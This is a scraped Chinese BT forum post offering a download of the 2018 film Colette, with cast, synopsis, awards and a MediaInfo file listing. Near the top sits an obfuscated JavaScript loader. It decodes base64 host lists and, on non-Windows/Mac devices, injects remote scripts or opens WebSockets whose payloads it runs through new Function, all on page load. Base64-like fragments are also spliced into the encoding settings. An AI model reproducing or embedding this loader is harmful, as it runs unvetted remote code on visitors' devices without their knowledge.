柯莱特[中文字幕].Colette.2018.1080p.迅雷下载 9.34GB

版主小s 1月前 134

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 柯莱特 / 科莱特 / 花都教主柯蕾特(台) / 写我华丽缘(港)

◎片 名 Colette

◎年 代 2018

◎产 地 英国 / 美国

◎类 别 剧情 / 传记 / 历史

◎语 言 英语

◎上映日期 2018-01-20(圣丹斯电影节) / 2018-09-21(美国) / 2019-01-09(英国)

◎IMDb链接 https://www.imdb.com/title/tt5437928/

◎豆瓣评分 7.5/10 (13046人评价)

◎豆瓣链接 https://movie.douban.com/subject/26721646/

◎片 长 111分钟

◎导 演 沃什·韦斯特摩兰 Wash Westmoreland (id:1032873)

◎编 剧 理查德·格雷泽 Richard Glatzer (id:1284959)

丽贝卡·伦科维茨 Rebecca Lenkiewicz (id:1341294)

沃什·韦斯特摩兰 Wash Westmoreland (id:1032873)

◎演 员 凯拉·奈特莉 Keira Knightley (id:1054448)

多米尼克·韦斯特 Dominic West (id:1027173)

埃莉诺·汤姆林森 Eleanor Tomlinson (id:1275043)

费奥纳·肖 Fiona Shaw (id:1009364)

丹妮斯·高夫 Denise Gough (id:1380217)

艾莎·哈特 Aiysha Hart (id:1337307)

丽贝卡·鲁特 Rebecca Root (id:1250687)

阿尔·韦弗 Al Weaver (id:1348728)

卡罗琳·博尔顿 Caroline Boulton (id:1367467)

雷·潘莎基 Ray Panthaki (id:1005127)

珊农·塔伯特 Shannon Tarbet (id:1370694)

阿提拉·阿帕 Attila árpa (id:1058673)

阿拉贝拉·韦尔 Arabella Weir (id:1037178)

羽田正义 Masayoshi Haneda (id:1340067)

罗德里克·希尔 Roderick Hill (id:1367469)

杰宁·哈瑞妮 Janine Harouni (id:1392803)

凯汀卡·埃格雷斯 Katinka Egres (id:1259319)

马泰·豪曼 Máté Haumann (id:1223421)

迪基·博 Dickie Beau (id:1406556)

杰克·格拉夫 Jake Graf (id:1439593)

约翰尼·帕尔默 Johnny K. Palmer (id:1439654)

吉尔斯·纳特金斯 Giles Nuttgens (id:1293331)

◎标 签 女性 / 传记 / 英国 / 文艺 / 独立 / 剧情 / 2018 / LGBT

◎简 介

故事发生在19世纪末的英国,单纯美丽的女孩柯莱特(凯拉·奈特莉KeiraKnightley饰)嫁给了身为作家的男子威力(多米尼克·威斯特DominicWest饰)。在丈夫的支持和鼓励之下,柯莱特拿起了笔,开始以自己学生时代的经历为蓝本进行创作,并且最终完成了她的第一本小说。让柯莱特没有想到的是,威力竟然将小说冠上了自己的名字出版,这部小说一经出版就在文坛中引起了轰动,威力一举成名。

自此之后,威力发现了妻子身上出色的文学天赋,于是开始逼迫她继续做自己的枪手,当柯莱特忍无可忍拒绝了丈夫的无理要求后,威力竟然暴力相向。威力有了外遇,而柯莱特也发现,自己虽然身为女性,但是对女性有着强烈的吸引力。

◎获奖情况 (共7项)

第34届美国独立精神奖 (2019)

最佳剧本(提名)

└──沃什·韦斯特摩兰 (id:1032873)

└──丽贝卡·伦科维茨 (id:1341294)

└──理查德·格雷泽 (id:1284959)

第21届英国独立电影奖 (2018)

最佳男配角(提名)

└──多米尼克·韦斯特 (id:1027173)

最佳服装设计(提名)

最佳化妆与发型设计(提名)

最佳艺术指导(提名)

第23届金卫星奖 (2019)

电影部门 最佳原创配乐(提名)

电影部门 最佳服装设计(提名)

  1. General

  2. Unique ID : 296535069094414683543523259746611175505 (0xDF1693B091CC52D08800EF216A012051)

  3. Complete name : Colette.2018.1080p.BluRay.x264.DTS-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 9.33 GiB

  7. Duration : 1 h 52 min

  8. Overall bit rate : 11.9 Mb/s

  9. Movie name : Colette

  10. Encoded date : UTC 2021-06-26 08:13:59

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 52 min

  25. Bit rate : 10.3 Mb/s

  26. Width : 1 920 pixels

  27. Height : 800 pixels

  28. Display aspect ratio : 2.40:1

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.280

  36. Stream size : 8.07 GiB (87%)

  37. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=18.0000 / qcomp=0.65 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.80 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Default : Yes

  40. Forced : No


  41. Audio

  42. ID : 2

  43. ID in the original source medium : 4352 (0x1100)

  44. Format : DTS

  45. Format/Info : Digital Theater Systems

  46. Codec ID : A_DTS

  47. Duration : 1 h 52 min

  48. Bit rate mode : Constant

  49. Bit rate : 1 509 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : C L R Ls Rs LFE

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 24 bits

  55. Compression mode : Lossy

  56. Stream size : 1.18 GiB (13%)

  57. Language : English

  58. Default : Yes

  59. Forced : No

  60. Original source medium : Blu-ray


  61. Text #1

  62. ID : 3

  63. ID in the original source medium : 4610 (0x1202)

  64. Format : PGS

  65. Muxing mode : zlib

  66. Codec ID : S_HDMV/PGS

  67. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  68. Duration : 1 h 43 min

  69. Bit rate : 54.9 kb/s

  70. Count of elements : 2587

  71. Stream size : 40.6 MiB (0%)

  72. Title : chs&eng

  73. Language : Chinese

  74. Default : Yes

  75. Forced : No

  76. Original source medium : Blu-ray


  77. Text #2

  78. ID : 4

  79. ID in the original source medium : 4611 (0x1203)

  80. Format : PGS

  81. Muxing mode : zlib

  82. Codec ID : S_HDMV/PGS

  83. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  84. Duration : 1 h 43 min

  85. Bit rate : 55.3 kb/s

  86. Count of elements : 2587

  87. Stream size : 40.9 MiB (0%)

  88. Title : cht&eng

  89. Language : Chinese

  90. Default : No

  91. Forced : No

  92. Original source medium : Blu-ray


  93. Text #3

  94. ID : 5

  95. ID in the original source medium : 4612 (0x1204)

  96. Format : PGS

  97. Muxing mode : zlib

  98. Codec ID : S_HDMV/PGS

  99. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  100. Duration : 1 h 43 min

  101. Bit rate : 31.2 kb/s

  102. Count of elements : 2587

  103. Stream size : 23.1 MiB (0%)

  104. Title : chs

  105. Language : Chinese

  106. Default : No

  107. Forced : No

  108. Original source medium : Blu-ray


  109. Text #4

  110. ID : 6

  111. ID in the original source medium : 4613 (0x1205)

  112. Format : PGS

  113. Muxing mode : zlib

  114. Codec ID : S_HDMV/PGS

  115. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  116. Duration : 1 h 43 min

  117. Bit rate : 31.6 kb/s

  118. Count of elements : 2587

  119. Stream size : 23.4 MiB (0%)

  120. Title : cht

  121. Language : Chinese

  122. Default : No

  123. Forced : No

  124. Original source medium : Blu-ray


  125. Text #5

  126. ID : 7

  127. ID in the original source medium : 4608 (0x1200)

  128. Format : PGS

  129. Muxing mode : zlib

  130. Codec ID : S_HDMV/PGS

  131. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  132. Duration : 1 h 42 min

  133. Bit rate : 48.7 kb/s

  134. Count of elements : 3029

  135. Stream size : 35.9 MiB (0%)

  136. Title : eng

  137. Language : English

  138. Default : No

  139. Forced : No

  140. Original source medium : Blu-ray


  141. Menu

  142. 00:00:00.000 : Chapter 01

  143. 00:06:46.155 : Chapter 02

  144. 00:12:25.786 : Chapter 03

  145. 00:18:55.467 : Chapter 04

  146. 00:24:20.834 : Chapter 05

  147. 00:29:14.627 : Chapter 06

  148. 00:36:25.600 : Chapter 07

  149. 00:42:02.895 : Chapter 08

  150. 00:48:34.411 : Chapter 09

  151. 00:52:45.745 : Chapter 10

  152. 00:57:36.411 : Chapter 11

  153. 01:02:17.942 : Chapter 12

  154. 01:09:44.930 : Chapter 13

  155. 01:15:22.017 : Chapter 14

  156. 01:19:53.288 : Chapter 15

  157. 01:23:17.200 : Chapter 16

  158. 01:29:26.611 : Chapter 17

  159. 01:35:05.574 : Chapter 18

  160. 01:41:11.231 : Chapter 19

  161. 01:45:15.309 : Chapter 20


此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 剧情 历史 传记

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回